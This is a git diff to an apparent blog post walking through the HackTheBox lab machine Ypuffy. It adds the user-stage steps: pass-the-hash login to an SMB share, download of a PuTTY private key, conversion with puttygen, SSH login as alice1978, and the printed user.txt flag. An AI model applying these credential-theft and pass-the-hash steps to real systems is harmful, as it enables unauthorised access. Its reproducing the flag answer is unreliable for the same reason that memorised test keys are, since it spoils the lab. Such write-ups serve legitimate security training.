--- a/_posts/2019-01-05-Ypuffy.md
+++ b/_posts/2019-01-05-Ypuffy.md
@@ -148,18 +148,43 @@ Next, the `alice` share was accessed once again using the hashed Samba password 
 root@kali:~/workspace/hackthebox/Ypuffy# smbclient --user=alice1978 --pw-nt-hash //10.10.10.107/alice
 ```
 
-After connecting and listing the files with the `dir` command, the only file present in the `alice` SMB share is `my_private_key.ppk`. The `.ppk` extension suggests that this is a PuTTY private key file, and that the contents within are the `alice` user's private SSH key. The `my_private_key.ppk` file can be copied to the attacking system using the `get` SMB command.
+After connecting and listing the files with the `dir` command, the only file present in the `alice` SMB share is `my_private_key.ppk`. The `.ppk` extension suggests that this is a PuTTY private key file, and that the contents within are the `alice1978` user's private SSH key. The `my_private_key.ppk` file can be copied to the attacking system using the `get` SMB command.
 
 ```
 smb: \> get my_private_key.ppk 
 getting file \my_private_key.ppk of size 1460 as my_private_key.ppk (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
 ```
 
+With the `alice1978` user's private SSH key, it is likely possible to access the target system via SSH after some slight modifications to the `my_private_key.ppk` file. Note that the `nmap` scan suggests that the SSH server running on port 22 of the target system is OpenSSH server (confirmed below).
 
+```
+root@kali:~/workspace/hackthebox/Ypuffy# telnet 10.10.10.107 22
+Trying 10.10.10.107...
+Connected to 10.10.10.107.
+Escape character is '^]'.
+SSH-2.0-OpenSSH_7.7
+```
 
+As the `my_private_key.ppk` file is a PuTTY private key file, the must first be converted to a format that is compatible with OpenSSH before connecting to the OpenSSH server on the target system. This can be accomplished using the `puttygen` tool as shown below (the tool can be installed with `apt-get install putty-tools`).
 
+```
+root@kali:~/workspace/hackthebox/Ypuffy# puttygen my_private_key.ppk -O private-openssh -o alice1978-opensshkey
+```
 
+The target system can now be accessed as the `alice1978`.
 
+```
+root@kali:~/workspace/hackthebox/Ypuffy# ssh alice1978@10.10.10.107 -i alice1978-opensshkey
+```
+
+The `user.txt` flag can now be read as the `alice1978` user.
+
+```
+ypuffy$ whoami
+alice1978
+ypuffy$ cat user.txt
+acbc06eb2982b14c2756b6c6e3767aab
+```
 
 ## Root
 
